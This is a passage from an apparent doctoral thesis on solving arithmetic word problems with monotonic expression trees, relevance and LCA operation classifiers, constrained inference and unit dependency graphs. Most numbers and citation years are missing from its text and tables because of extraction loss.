lca-equivalent to t if for every pair quantities qi,qj in the expression e, we have �lca(qi,qj,t ) = �lca(qi,qj,t ). theorem . . . all monotonic expression trees for an expression are lca-equivalent to each other. proof. we prove by induction on the number of quantities used in an expression. for all expressions e with quantities, there exists only one monotonic expression tree, and hence, the statement is trivially true. this satisfies our base case. for the inductive case, we assume that for all expressions with k < n quantities, the theorem is true. now, we need to prove that any expression with n nodes will also satisfy the property. consider a valid (as in all cases) expression e, with monotonic expression trees t and t . from theorem . . , we know that the chains containing the roots of t and t have identical type and terms. given two quantities qi,qj of e, the lowest common ancestor of both t and t will either both belong to the chain containing the root, or both belong to one of the chain terms. if the lca node is part of the chain for both t and t , monotonic property ensures that the lca operation will be identical. if the lca node is part of a chain term (which is an expression tree of size less than n), the property is satisfied by induction hypothesis. the theory just presented suggests that it is possible to uniquely decompose the overall problem to simpler steps and this will be exploited in the next section. . mapping problems to expression trees given the uniqueness properties proved in sec. . , it is sufficient to identify the operation between any two relevant quantities in the text, in order to determine the unique valid expression. in fact, identifying the operation between any pair of quantities provides much needed redundancy given the uncertainty in identifying the operation from text, and we exploit it in our final joint inference. consequently, our overall method proceeds as follows: given the problem text p , we detect quantities q ,q , . . . ,qn. we then use two classifiers, one for relevance and other to predict the lca operations for a monotonic expression tree of the solution. our training makes use of the notion of quantity schemas, which we describe in section . . . the distributional output of these classifiers is then used in a joint inference procedure that determines the final expression tree. our training data consists of problem text paired with a monotonic expression tree for the solution expression and alignment of quantities in the expression to quantity mentions in the problem text. both the relevance and lca operation classifiers are trained on gold annotations. . . global inference for expression trees in this subsection, we define the scoring functions corresponding to the decomposed problems, and show how we combine these scores to perform global inference. for a problem p with quantities q ,q , . . . ,qn, we define the following scoring functions: . pair(qi,qj,op) : scores the likelihood of �lca(qi,qj,t ) = op, where t is a monotone expression tree of the solution expression of p . a multiclass classifier trained to predict lca operations (section . . ) can provide these scores. . irr(q) : scores the likelihood of quantity q being an irrelevant quantity in p , that is, q is not used in creating the solution. a binary classifier trained to predict whether a quantity q is relevant or not (section . . ), can provide these scores. for an expression e, let i(e) be the set of all quantities in p which are not used in expression e. let t be a monotonic expression tree for e. we define score(e) of an expression e in terms of the above scoring functions and a scaling parameter wirr as follows: score(e) =wirr ∑ q∈i(e) irr(q) + ∑ qi,qj /∈i(e) pair(qi,qj,�lca(qi,qj,t )) ( . ) our final expression tree is an outcome of a constrained optimization process, following [roth and yih, , chang et al., ]. our objective function makes use of the scores returned by irr(·) and pair(·) to deter- mine the expression tree and is constrained by legitimacy and background knowledge constraints, detailed below. . positive answer: most arithmetic problems asking for amounts or number of objects usually have a positive number as an answer. therefore, while searching for the best scoring expression, we reject expressions generating negative answer. . integral answer: problems with questions such as ‘how many” usually expect integral solutions. we only consider integral solutions as legitimate outputs for such problems. let c be the set of valid expressions that can be formed using the quantities in a problem p , and which satisfy the above constraints. the inference algorithm now becomes the following: arg max e∈c score(e) ( . ) the space of possible expressions is large, and we employ a beam search strategy to find the highest scoring constraint satisfying expression [chang et al., ]. we construct an expression tree using a bottom up approach, first enumerating all possible sets of irrelevant quantities, and next over all possible expressions, keeping the top k at each step. we give details below. . enumerating irrelevant quantities: we generate a state for all possible sets of irrelevant quantities, ensuring that there is at least two relevant quantities in each state. we refer to each of the relevant quantities in each state as a term. therefore, each state can be represented as a set of terms. . enumerating expressions: for generating a next state s′ from s, we choose a pair of terms ti and tj in s and one of the four basic operations, and form a new term by combining terms ti and tj with the operation. since we do not know which of the possible next states will lead to the optimal goal state, we enumerate all possible next states (that is, enumerate all possible pairs of terms and all possible operations); we prune the beam to keep only the top k candidates. we terminate when all the states in the beam have exactly one term. once we have a top k list of candidate expression trees, we choose the highest scoring tree which satisfies the constraints. however, there might not be any tree in the beam which satisfies the constraints, in which case, we choose the top candidate in the beam. we use k = in our experiments. in order to choose the value for the wirr, we search over the set { − , − , − , , , , }, and choose the parameter setting which gives the highest accuracy on the training data. . . quantity schema in order to generalize across problem types as well as over simple manipulations of the text, it is necessary to train our system only with relevant information from the problem text. e.g., for the problem in example . , we do not want to take decisions based on how tom earned money. therefore, there is a need to extract the relevant information from the problem text. to this end, we introduce the concept of a quantity schema which we extract for each quantity in the problem’s text. along with the question asked, the quantity schemas provides all the information needed to solve most arithmetic problems. a quantity schema for a quantity q in problem p consists of the following components. . associated verb for each quantity q, we detect the verb associated with it. we traverse up the dependency tree starting from the quantity mention, and choose the first verb we reach. we used the easy first dependency parser [goldberg and elhadad, ]. . subject of associated verb we detect the noun phrase, which acts as subject of the associated verb (if one exists). . unit we use a shallow parser to detect the phrase p in which the quantity q is mentioned. all tokens of the phrase (other than the number itself) are considered as unit tokens. also, if p is followed by the prepositional phrase “of” and a noun phrase (according to the shallow parser annotations), we also consider tokens from this second noun phrase as unit tokens. finally, if no unit token can be extracted, we assign the unit of the neighboring quantities as the unit of q (following previous work [hosseini et al., ]). . related noun phrases we consider all noun phrases which are connected to the phrase p containing quantity q, with np-pp-np attachment. if only one quantity is mentioned in a sentence, we consider all noun phrases in it as related. . rate we determine whether quantity q refers to a rate in the text, as well as extract two unit compo- nents defining the rate. for example, “ kilometers per hour” has two components “kilometers” and “hour”. similarly, for sentences describing unit cost like “each egg costs dollars”, “ ” is a rate, with units “dollars” and “egg”. in addition to extracting the quantity schemas for each quantity, we extract the surface form text which poses the question. for example, in the question sentence, “how much will john have to pay if he wants to buy oranges?”, our extractor outputs “how much will john have to pay” as the question. . . relevance classifier we train a binary svm classifier to determine, given problem text p and a quantity q in it, whether q is needed in the numeric expression generating the solution. we train on gold annotations and use the score of the classifier as the scoring function irr(·). features the features are extracted from the quantity schemas and can be broadly categorized into three groups: . unit features: most questions specifically mention the object whose amount needs to be computed, and hence questions provide valuable clue as to which quantities can be irrelevant. we add a feature for whether the unit of quantity q is present in the question tokens. also, we add a feature based on whether the units of other quantities have better matches with question tokens (based on the number of tokens matched), and one based on the number of quantities which have the maximum number of matches with the question tokens. . related np features: often units are not enough to differentiate between relevant and irrelevant quantities. consider the following: example . problem : there are apples in a pile on the desk. each apple comes in a package of . apples are added to the pile. how many apples are there in the pile? solution : ( + ) = the relevance decision depends on the noun phrase “the pile”, which is absent in the second sentence. we add a feature indicating whether a related noun phrase is present in the question. also, we add a feature based on whether the related noun phrases of other quantities have better match with the question. extraction of related noun phrases is described in section . . . . miscellaneous features: when a problem mentions only two quantities, both of them are usually relevant. hence, we also add a feature based on the number of quantities mentioned in text. we include pairwise conjunction of the above features. . . lca operation classifier in order to predict lca operations, we train a multiclass svm classifier. given problem text p and a pair of quantities pi and pj, the classifier predicts one of the six labels described in eq. . . we consider the confidence scores for each label supplied by the classifier as the scoring function pair(·). features we use the following categories of features: . individual quantity features: dependent verbs have been shown to play significant role in solving addition and subtraction problems [hosseini et al., ]. hence, we add the dependent verb of the quantity as a feature. multiplication and division problems are largely dependent on rates described in text. to capture that, we add a feature based on whether the quantity is a rate, and whether any component of rate unit is present in the question. in addition to these quantity schema features, we add selected tokens from the neighborhood of the quantity mention. neighborhood of quantities are often highly informative of lca operations, for example, “he got more marbles”, the term “more” usually indicates addition. we add as features adverbs and comparative adjectives mentioned in a window of size around the quantity mention. . quantity pair features: for a pair (qi,qj) we add features to indicate whether they have the same dependent verbs, to indicate whether both dependent verbs refer to the same verb mention, whether the units of qi and qj are the same and, if one of them is a rate, which component of the unit matches with the other quantity’s unit. finally, we add a feature indicating whether the value of qi is greater than the value of qj. . question features: finally, we add a few features based on the question asked. in particular, for arithmetic problems where only one operation is needed, the question contains signals for the required operation. specifically, we add indicator features based on whether the question mentions comparison- related tokens (e.g., “more”, “less” or “than”), or whether the question asks for a rate (indicated by tokens such as “each” or “one”). we include pairwise conjunction of the above features. for both classifiers, we use the illinois-sl package under default settings. . experimental results ai il cc relax strict relax strict relax strict all features . . . . . . no individual quantity features . . . . . . no quantity pair features . . . . . . no question features . . . . . . table . : performance of lca operation classifier on the datasets ai , il and cc. in this section, we evaluate the proposed method on publicly available datasets of arithmetic word problems. we evaluate separately the relevance and lca operation classifiers, and show the contribution of various features. lastly, we evaluate the performance of the full system, and quantify the gains achieved by the constraints. . . datasets we evaluate our system on three datasets, each of which comprise a different category of arithmetic word problems. . ai dataset: this is a collection of addition and subtraction problems, released by [hosseini et al., ]. they performed a -fold cross validation, with every fold containing problems http://cogcomp.cs.illinois.edu/page/software view/illinois-sl from different sources. this helped them evaluate robustness to domain diversity. we follow the same evaluation setting. . il dataset: this is a collection of arithmetic problems released by [roy et al., ]. each of these problems can be solved by performing one operation. however, there are multiple problems having the same template. to counter this, we perform a few modifications to the dataset. first, for each problem, we replace the numbers and nouns with the part of speech tags, and then we cluster the problems based on unigrams and bigrams from this modified problem text. in particular, we cluster problems together whose unigram-bigram similarity is over %. we next prune each cluster to keep at most problems in each cluster. finally we create the folds ensuring all problems in a cluster are assigned to the same fold, and each fold has similar distribution of all operations. we have a final set of problems, and we use a -fold cross validation to evaluate on this dataset. . commoncore dataset: in order to test our system’s ability to handle multi-step problems, we create a new dataset of multi-step arithmetic problems. the problems were extracted from www.commoncoresheets.com. in total, there were problems, for each of the following types: (a) addition followed by subtraction (b) subtraction followed by addition (c) addition and multiplication (d) addition and division (e) subtraction and multiplication (f) subtraction and division this dataset had no irrelevant quantities. therefore, we did not use the relevance classifier in our evaluations. in order to test our system’s ability to generalize across problem types, we perform a -fold cross validation, with each fold containing all the problems from one of the aforementioned categories. this is a more challenging setting relative to the individual data sets mentioned above, since we are evaluating on multi-step problems, without ever looking at problems which require the same set of operations. . . relevance classifier table . evaluates the performance of the relevance classifier on the ai and il datasets. we report two accuracy values: relax - fraction of quantities which the classifier got correct, and strict - fraction of math problems, for which all quantities were correctly classified. we report accuracy using all features and then removing each feature group, one at a time. ai il relax strict relax strict all features . . . . no unit features . . . . no np features . . . . no misc. features . . . . table . : performance of relevance classifier on the datasets ai and il. we see that features related to units of quantities play the most significant role in determining relevance of quantities. also, the related np features are not helpful for the ai dataset. . . lca operation classifier table . evaluates the performance of the lca operation classifier on the ai , il and cc datasets. as before, we report two accuracies - relax - fraction of quantity pairs for which the classifier correctly predicted the lca operation, and strict - fraction of math problems, for which all quantity pairs were correctly classified. we report accuracy using all features and then removing each feature group, one at a time. the strict and relaxed accuracies for il dataset are identical, since each problem in il dataset only requires one operation. the features related to individual quantities are most significant; in particular, the accuracy goes to . in the cc dataset, without using individual quantity features. the question features are not helpful for classification in the cc dataset. this can be attributed to the fact that all problems in cc dataset require multiple operations, and questions in multi-step problems usually do not contain information for each of the required operations. . . global inference module table . shows the performance of our system in correctly solving arithmetic word problems. we show the impact of various constraints, and also compare against previously best known results on the ai and il datasets. we also show results using each of the two constraints separately, and using no constraints at all. ai il cc all constraints . . . positive constraint . . . integral constraint . . . no constraint . . . [hosseini et al., ] . - - [roy et al., ] - . - [kushman et al., ] . . . table . : accuracy in correctly solving arithmetic problems. first four rows represent various configurations of our system. we achieve state of the art results in both ai and il datasets. the previously known best result in the ai dataset is reported in [hosseini et al., ]. since we fol- low the exact same evaluation settings, our results are directly comparable. we achieve state of the art results, without having access to any additional annotated data, unlike [hosseini et al., ], who use labeled data for verb categorization. for the il dataset, we acquired the system of [roy et al., ] from the authors, and ran it with the same fold information. we outperform their system by an ab- solute gain of over %. we believe that the improvement was mainly due to the dependence of the system of [roy et al., ] on lexical and neighborhood of quantity features. in contrast, features from quantity schemas help us generalize across problem types. finally, we also compare against the template based system of [kushman et al., ]. [hosseini et al., ] mentions the result of running the system of [kushman et al., ] on ai dataset, and we report their result here. for il and cc datasets, we used the system released by [kushman et al., ]. the integrality constraint is particularly helpful when division is involved, since it can lead to fractional answers. it does not help in case of the ai dataset, which involves only addition and subtraction problems. the role of the constraints becomes more significant in case of multi-step problems and, in particular, they contribute an absolute improvement of over % over the system without constraints on the cc dataset. the template based system of [kushman et al., ] performs on par with our system on the il dataset. we believe that it is due to the small number of equation templates in the il dataset. it performs poorly on the cc dataset, since we evaluate on unseen problem types, which do not ensure that equation templates in the test data will be seen in the training data. . . discussion the leading source of errors for the classifiers are erroneous quantity schema extraction and lack of under- standing of unknown or rare verbs. for the relevance classifier on the ai dataset, % of the errors were due to mistakes in extracting the quantity schemas and % could be attributed to rare verbs. for the lca operation classifier on the same dataset, % of the errors were due to unknown verbs and % were due to mistakes in extracting the schemas. the erroneous extraction of accurate quantity schemas is very significant for the il dataset, contributing % of the errors for the relevance classifier and % of the errors for the lca operation classifier. for the operation classifier on the cc dataset, % of the errors were due to verbs and % were due to faulty quantity schema extraction. quantity schema extraction is challenging due to parsing issues as well as some non-standard rate patterns, and it will be one of the future work targets. for example, in the sentence, “how many -dollar toys can he buy?”, we fail to extract the rate component of the quantity . . conclusion in this chapter, we present a novel method for understanding and solving a general class of arithmetic word problems. our approach can solve all problems whose solution can be expressed by a read-once arithmetic expression, where each quantity from the problem text appears at most once in the expression. we de- velop a novel theoretical framework, centered around the notion of monotone expression trees, and showed how this representation can be used to get a unique decomposition of the problem. this theory natu- rally leads to a computational solution that we have shown to uniquely determine the solution - determine the arithmetic operation between any two quantities identified in the text. this theory underlies our al- gorithmic solution - we develop classifiers and a constrained inference approach that exploits redundancy in the information, and show that this yields strong performance on several benchmark collections. in particular, our approach achieves state of the art performance on two publicly available arithmetic prob- lem datasets and can support natural generalizations for quantitative reasoning over multiple quantities in text. specifically, our approach performs competitively on multistep problems, even when it has never observed the particular problem type before. the datasets used in this work are available for download at http://cogcomp.cs.illinois.edu/page/resource view/ . chapter unit dependency graphs . introduction most statistical word problem solvers till now (including the one described in the last chapter) were entirely data-driven. they depend on training examples to learn all the concepts needed for math word problem solving. however, often domain knowledge is needed for quantitative reasoning, which is not easy to learn from training data. dimensional analysis is an example of this kind of domain knowledge. applying the knowledge of dimensional analysis to the units of quantities can inform several quantitative inferences as exemplified below. let us look at the arithmetic word problem in example . . the units of “ ” and “ ” are both “flowers”, which indicate they can be added or subtracted. although unit of “ ” is also “flower”, it is associated with a rate, indicating the number of flowers in each bouquet. as a result, “ ” effectively has unit “flowers per bouquet”. detecting such rate units and applying dimensional analysis help understand that “ ” will more likely be multiplied or divided to arrive at the solution. finally, the question asks for the number of “bouquets”, indicating “ ” will likely be divided, and not multiplied. knowing such interactions could help understand the situation and perform better quantitative reasoning. in addition, given that unit extraction is a noisy process, this can make it more robust via global reasoning. this is exactly the focus of this chapter – to integrate domain knowledge about dimensional analysis into statistical methods for word problem solving. example . isabel picked flowers for her friends wedding. she was making bouquets with flowers in each one. if of the flowers wilted before the wedding, how many bouquets could she still make? we introduce the concept of unit dependency graph (udg) for math word problems, to represent the re- lationships among the units of different numbers, and the question being asked. we also introduce a strategy to extract annotations for unit dependency graphs, with minimal additional annotations. in particular, we use the answers to math problems, along with the rate annotations for a few selected problems, to generate complete annotations for unit dependency graphs. finally, we develop a decomposed model to predict udg given an input math word problem. we augment the arithmetic word problem solver of [roy and roth, ] to predict a unit dependency graph, along with the solution expression of the input arithmetic word problem. forcing the solver to respect the dependencies of the unit dependency graph enables us to improve unit extractions, as well as leverage the domain knowledge about unit dependencies in math reasoning. the introduction of unit dependency graphs reduced the error of the solver by over %, while also making it more robust to reduction in lexical and template overlap of the dataset. . unit dependency graph we first introduce the idea of a generalized rate, and its unit representation. we define rate to be any quantity which is some measure corresponding to one unit of some other quantity. this includes explicit rates like “ miles per hour”, as well as implicit rates like the one in “each student has books”. consequently, units for rate quantities take the form “a per b”, where a and b refer to different entities. we refer to a as num unit (short for numerator unit), and b as den unit (short for denominator unit). table . shows examples of num and den units for various rate mentions. mention num unit den unit miles per hour mile hour each student has books. book student table . : units of rate quantities a unit dependency graph (udg) of a math word problem is a graph representing the relations among quantity units and the question asked. fig. . shows an example of a math word problem and its unit dependency graph. for each quantity mentioned in the problem, there exists a vertex in the unit dependency graph. in addition, there is also a vertex representing the question asked. therefore, if a math problem mentions n quantities, its unit dependency graph will have n + vertices. in the example in fig . , there is one vertex corresponding to each of the quantities , and , and one vertex representing the question part “how many bouquets could she still make ?”. problem isabel picked flowers for her friends wedding. she was making bouquets with flowers in each one. if of the flowers wilted before the wedding, how many bouquets could she still make? unit dependency graph how many bouquets rate num unit den unit num unit same unit expression tree of solution − ÷ figure . : an arithmetic word problem, its udg, and a tree representation of the solution ( − )/ . several dependencies exist between the udg and the final solution of a problem. here, “ ” and “ ” are connected via same unit edge, hence they can be added or subtracted, “ ” is connected by den unit to the question, indicating that some expression will be divided by “ ” to get the answer’s unit. a vertex representing a number, is labeled rate, if the corresponding quantity describes a rate relation- ship (according to the aforementioned definition). in fig . , “ ” is labeled as a rate since it indicates the number of flowers in each bouquet. similarly, a vertex corresponding to the question is marked rate if the question asks for a rate. edges of a udg can be directed as well as undirected. each undirected edge has the label same unit, indicating that the connected vertices have the same unit. each directed edge going from vertex u to vertex v can have one of the following labels: . num unit : valid only for directed edges with source vertex u labeled as rate, indicates that num unit of u matches the unit of the destination vertex v. . den unit : valid only for directed edges with source vertex labeled as rate, indicates that den unit of source vertex u matches the unit of the destination vertex v. if no edge exists between a pair of vertices, they have unrelated units. several dependencies exist between the vertex and edge labels of the unit dependency graph of a problem, and its solution expression. sec . . discusses these dependencies and how they can be leveraged to improve math problem solving. . learning to predict udgs predicting udg for a math word problem is essentially a structured prediction problem. however, since we have limited training data, we develop a decomposed model to predict parts of the structure inde- pendently, and then perform joint inference to enforce coherent predictions. this has been shown to be an effective method for structured prediction in the presence of limited data [punyakanok et al., b, sutton and mccallum, ]. empirically, we found our decomposed model to be superior to jointly trained alternatives (see section . ). our decomposed model for udg prediction uses the following two classifiers. . vertex classifier : this is a binary classifier, which takes a vertex of the udg as input, and decides whether it denotes a rate. . edge classifier : this is a multiclass classifier, which takes as input a pair of nodes of the udg, and predicts the properties of the edge connecting those nodes. finally, a constrained inference module combines the output of the two classifiers to construct a udg. we provide details of the components in the following subsections. . . vertex classifier in order to detect rate quantities, we train a binary classifier. given problem text p and a vertex v of the udg, the classifier predicts whether v represents a rate. it predicts one of two labels - rate or not rate. the vertex v is either a quantity mentioned in p , or the question of p . the features used for the classification are as follows : . context features: we add unigrams, bigrams, part of speech tags, and their conjunctions from the neighborhood of v. . rule based extraction features: we add a feature indicating whether a rule based approach can detect v as a rate. . . edge classifier we train a multiclass classifier to determine the properties of the edges of the udg. given problem text p and a pair of vertices vi and vj (i < j), the classifier predicts one of the six labels : . same unit : indicates that vi and vj should be connected by an undirected edge labeled same unit. . no relation : indicates no edge exists between vi and vj. . rate→num : indicates that vi is a rate, and the num unit of vi matches the unit of vj. . rate←num : indicates that vj is a rate, and the num unit of vj matches the unit of vi. . we similarly define rate→den and rate ← den. the features used for the classification are : . context features: for each vertex v in the query, we add the context features described for vertex classifier. . rule based extraction features: we add a feature indicating whether each of the queried vertices is detected as a rate by the rule based system. in addition, we also add features denoting whether there are common tokens in the units of vi and vj. . . constrained inference our constrained inference module takes the scores of the vertex and edge classifiers, and combines them to find the most probable unit dependency graph for a problem. we define vertex(v,l) to be the score predicted by the vertex classifier for labeling vertex v of a udg with label l, where l ∈{rate,not rate}. similarly, we define edge(vi,vj, l) to be the score predicted by the edge classifier for the assignment of label l to the edge between vi and vj. here the label l is one of the six labels defined for the edge classifier. let g be a udg with vertex set v . we define the score for g as follows: score(g) = ∑ v∈v label(g,v)=rate vertex(v,rate) + λ× ∑ vi,vj∈v,i<j edge(vi,vj,label(g,vi,vj)) where λ is a scaling factor, and label maps labels of the udg, to the labels of the corresponding classifiers. label(g,v) maps to rate, if v is a rate, otherwise it maps to not rate. similarly, if no edge exists between vi and vj, label(g,vi,vj) maps to no relation, if num unit of vi matches the unit of vj, label(g,vi,vj) maps to rate → num, and so on. finally, the inference problem has the following form: arg max g∈graphs score(g) where graphs is the set of all valid unit dependency graphs for the input problem. . joint inference with an arithmetic solver in this section, we describe our joint inference procedure to predict both a udg and the solution of an input arithmetic word problem. our model is built on the arithmetic word problem solver of [roy and roth, ], and we briefly describe it in the following sections. we first describe the concept of expression trees, and next describe the solver, which leverages expression tree representation of the solutions. . . monotonic expression tree an expression tree is a binary tree representation of a mathematical expression, where leaves represent numbers, and all non-leaf nodes represent operations. fig . shows an example of an arithmetic word problem and the expression tree of the solution mathematical expression. a monotonic expression tree is a normalized expression tree representation for math expressions, which restricts the order of combination of addition and subtraction nodes, and multiplication and division nodes. the expression tree in fig . is monotonic. . . arithmetic word problem solver we now describe the solver pipeline of [roy and roth, ]. given a problem p with quantities q ,q , . . . ,qn, the solver uses the following two classifiers. . irrelevance classifier : given as input, problem p and quantity qi mentioned in p , the classifier decides whether qi is irrelevant for the solution. the score of this classifier is denoted as irr(q). . lca operation classsifier : given as input, problem p and a pair of quantities qi and qj (i < j), the classifier predicts the operation at the lowest common ancestor (lca) node of qi and qj, in the solution expression tree of problem p. the set of possible operations are +, −, −r, ×, ÷ and ÷r (the subscript r indicates reverse order). considering only monotonic expression trees for the solution makes this operation unique for any pair of quantities. the score of this classifier for operation o is denoted as lca(qi,qj,o). the above classifiers are used to gather irrelevance scores for each number, and lca operation scores for each pair of numbers. finally, constrained inference procedure combines these scores to generate the solution expression tree. let i(t) be the set of all quantities in p which are not used in expression tree t, and λirr be a scaling parameter. the score score(t) of an expression tree t is defined as: score(t) = λirr ∑ q∈i(t ) irr(q) + ∑ qi,qj /∈i(t ) lca(qi,qj,�lca(qi,qj,t)) where �lca(qi,qj,t) denotes the operation at the lowest common ancestor node of qi and qj in monotonic expression tree t . let trees be the set of valid expressions that can be formed using the quantities in a problem p , and also give positive solutions. the inference algorithm now becomes: arg max t∈trees score(t) . . joint inference we combine the scoring functions of udg prediction and the ones from the solver of [roy and roth, ], so that we can jointly predict the udg and the solution of the problem. for an input arithmetic word problem p , we score tuples (g,t) (where g is a candidate udg for p , and t is a candidate solution expression tree of p) as follows : score(g,t) =λirr ∑ q∈i(t ) irr(q) + ∑ qi,qj /∈i(t ) lca(qi,qj,�lca(qi,qj,t))+ λvertex ∑ v∈v label(g,v)=rate vertex(v,rate) + λedge ∑ vi,vj∈v,i<j edge(vi,vj,label(g,vi,vj)) where λirr, λvertex and λedge are scaling parameters. this is simply a scaled addition of the scores for udg prediction and solution expression generation. finally, the inference problem is arg max (g,t )∈tuples score(g,t) where tuples is the set of all tuples (g,t), such that g ∈ graphs, t ∈ trees, and g is a consistent udg for the solution tree t. . . consistent rate unit graphs we have a set of conditions to check whether g is a consistent udg for monotonic tree t . most of these conditions are expressed in terms of path(t,vi,vj), which takes as input a pair of vertices vi,vj of the udg g, and a monotonic expression tree t , and returns the following. . if both vi and vj are numbers, and their corresponding leaf nodes in t are ni and nj respectively, then it returns the nodes in the path connecting ni and nj in t. . if only vi denotes a number (implying vj represents the question), the function returns the nodes in the path from ni to the root of t, where ni is the corresponding leaf node for vi. for the unit dependency graph and solution tree t of fig . , path(t, , ) is {−,÷}, whereas path(t, , question) is {÷}. finally, the conditions for consistency between a udg g and an expression tree t are as follows: . if vi is the only vertex labeled rate and it is the question, there should not exist a path from some leaf n to the root of t which has only addition, subtraction nodes. if that exists, it implies n can be added or subtracted to get the answer, that is, the corresponding vertex for n in g has same unit as the question, and should have been labeled rate. . if vi is labeled rate and the question is not, the path from ni (corresponding leaf node for vi) to the root of t cannot have only addition, subtraction nodes. otherwise, the question will have same rate units as vi. . we also check whether the edge labels are consistent with the vertex labels using algorithm , which computes edge labels of udgs, given the expression tree t , and vertex labels. it uses heuristics like if a rate r is being multiplied by a non-rate number n, the den unit of r should match the unit of n, etc. algorithm edgelabel input: monotonic expression tree t , vertex pairs vi,vj, and their corresponding vertex labels output: label of edge between vi and vj : path ← path(t,vi,vj) : countmuldiv ← number of multiplication and division nodes in path : if vi and vj have same vertex label, and countmuldiv = then : return same unit : end if : if vi and vj have different vertex labels, and countmuldiv = then : if path contains × and vi is rate then : return rate→den : end if : if path contains × and vj is rate then : return rate←den : end if : if path contains ÷ and vi is rate then : return rate→num : end if : if path contains ÷r and vj is rate then : return rate←num : end if : end if : return cannot determine edge label these consistency conditions prevent the inference procedure from considering any inconsistent tuples. they help the solver to get rid of erroneous solutions which involve operations inconsistent with all high scoring udgs. finally, in order to find the highest scoring consistent tuple, we have to enumerate the members of tuples, and score them. the size of tuples however is exponential in the number of quantities in the problem. as a result, we perform beam search to get the highest scoring tuple. we first enumerate the members of trees, and next for each member of trees, we enumerate consistent udgs. . experiments in this section, we evaluate our proposed method, and quantify the gains achieved by using udgs in solving arithmetic word problems. . . dataset we detected several issues in the existing datasets for arithmetic word problem solvers, and how they were used for evaluation. the evaluation in the last chapter was done separately on different types of arithmetic problems. this does not capture how well the systems can distinguish between these different problem types. datasets released by [roy and roth, ] and [koncel-kedziorski et al., ] mention irrelevant quantities in words, and only the relevant quantities are mentioned in digits. this removes the challenge of detecting extraneous quantities. also, the folds for commoncore dataset were created in an adverserial manner to force the systems to only test on unseen equation forms. this seems too harsh for template based systems, who search the output space based on previously seen equation forms. in order to address the aforementioned issues, we pooled arithmetic word problems from all available datasets [hosseini et al., , roy and roth, , koncel-kedziorski et al., ], and normalized all men- tions of quantities to digits. we next prune problems such that there do not exist a problem pair with over % match of unigrams and bigrams. the threshold of % was decided manually by determining that problems with around % overlap are sufficiently different. we finally ended up with problems. we refer to this dataset as allarith. we also create subsets of allarith using the mawps system [koncel-kedziorski et al., ]. mawps can generate subsets of word problems based on lexical and template overlap. lexical overlap is a measure of reuse of lexemes among problems in a dataset. high lexeme reuse allows for spurious associations between the problem text and a correct solution [koncel-kedziorski et al., ]. evaluating on low lexical overlap subset of the dataset can show the robustness of solvers to lack of spurious associations. template overlap is a measure of reuse of similar equation templates across the dataset. several systems focus on solving problems under the assumption that similar equation templates have been seen at training time. evaluating on low template overlap subset can show the reliance of systems on the reuse of equation templates. we create two subsets of problems each - one with low lexical overlap called allarithlex, and one with low template overlap called allarithtmpl. we report random -fold cross validation results on all these datasets. for each fold, we choose % of the training data as development set, and tune the scaling parameters on this set. once the parameters are set, we retrain all the models on the entire training data. we use a beam size of in all our experiments. . . data acquisition in order to learn the classifiers for predicting vertex and edge labels for udgs, we need annotated data. however, gathering vertex and edge labels for udgs of problems, can be expensive. in this section, we show that vertex labels for a subset of problems, along with annotations for solution expressions, can be sufficient to gather high quality annotations for vertex and edge labels of udgs. given an arithmetic word problem p , annotated with the monotonic expression tree t of the solution expression, we try to acquire annotations for the udg of p . first, we try to determine the labels for the vertices, and next the edges of the graph. we check if t has any multiplication or division node. if no such node is present, we know that all the numbers in the leaves of t have been combined via addition or subtraction, and hence, none of them describes a rate in terms of the units of other numbers. this determines that none of t ’s leaves is a rate, and also, the question does not ask for a rate. if a multiplication or division node is present in t, we gather annotations for the numbers in the leaves of t as well as the question of p . annotators were asked to mark whether each number represents a rate relationship, and whether the question in p asks for a rate. this process determines the labels for the vertices of the udg. two annotators performed these annotations, with an agreement of . (kappa). once we have the labels for the vertices of the udg, we try to infer the labels for the edges using algorithm . when the algorithm is unable to infer the label for a particular edge, we heuristically label that edge to be no relation. the above process allowed us to extract high quality annotations for udgs with minimal manual anno- tations. in particular, we only had to annotate vertex labels for problems, out of the problems in allarith. obviously some of the extracted no relation edge labels are noisy; this can be remedied by collecting annotations for these cases. however, in this work, we did not use any manual annotations for edge labels. features vertex classifier edge classifier allarith allarithlex allarithtmpl allarith allarithlex allarithtmpl all features . . . . . . no rule based features . . . . . . no context fea- tures . . . . . . table . : performance of system components for predicting vertex and edge labels for unit dependency graphs . . udg prediction table . shows the performance of the classifiers and the contribution of each feature type. the results indicate that rule-based techniques are not sufficient for robust extraction, there is a need to take context into account. table . shows the performance of our decomposed model (decompose) in correctly predicting udgs, as well as the contribution of constraints in the inference procedure. having explicit constraints for the graph structure provides - % improvement in correct udg prediction. we also compare against a jointly trained model (joint), which learns to predict all vertex and edge labels together. note that joint also uses the same set of constraints as decompose in the inference procedure, to ensure it only predicts valid unit dependency graphs. we found that joint does not outperform decompose, while taking significantly more time to train. the worse performance of joint learning is due to: ( ) search space being too large for the joint model to do well given our relatively small dataset size, and ( ) our independent classifiers being good enough, thus supporting better joint inference. this tradeoff is strongly supported in the literature [punyakanok et al., b, sutton and mccallum, ]. note, that all these evaluations are based on noisy edges annotations. this was done to reduce further annotation effort. also, less than % of labels were noisy (indicated by fraction of no relation labels), which makes this evaluation reasonable. allarith allarithlex allarithtmpl decompose . . . - constraints . . . joint . . . table . : performance in predicting udgs . . solving arithmetic word problems here we evaluate the accuracy of our system in correctly solving arithmetic word problems. we refer to our system as unitdep. we compare against the following systems: . lca++ : system of [roy and roth, ] with feature set augmented by neighborhood features, and with only positive answer constraint. we found that augmenting the released feature set with context features, and removing the integral answer constraint, were helpful. our system unitdep also uses the augmented feature set for relevance and lca operation classifiers, and only positive constraint for final solution value. . template : template based algebra word problem solver of [kushman et al., ]. . singleeq : single equation word problem solver of [koncel-kedziorski et al., ]. in order to quantify the gains due to vertex and edge information of udgs, we also run two variants of unitdep - one with λvertex = , and one with λedge = . table . shows the performance of these systems on allarith, allarithlex and allarithtmpl. system allarith allarithlex allarithtmpl template . . . singleeq . . . lca++ . . . unitdep . . . λvertex = . . . λedge = . . . table . : performance in solving arithmetic word problems unitdep outperforms all other systems across all datasets. setting either λvertex = or λedge = leads to a drop in performance, indicating that both vertex and edge information of udgs assist in math problem solving. note that setting both λvertex and λedge to , is equivalent to lca++. singleeq performs worse than other systems, since it does not handle irrelevant quantities in a problem. in general, reduction of lexical overlap adversely affects the performance of most systems. the reduction of template overlap does not affect performance as much. this is due to the limited number of equation templates found in arithmetic problems. introduction of udgs make the system more robust to reduction of both lexical and template overlap. in particular, they provide an absolute improvement of % in both allarithlex and allarithtmpl datasets (indicated by difference of lca++ and unitdep results). for the sake of completeness, we also ran our system on the previously used datasets, achieving % and % absolute 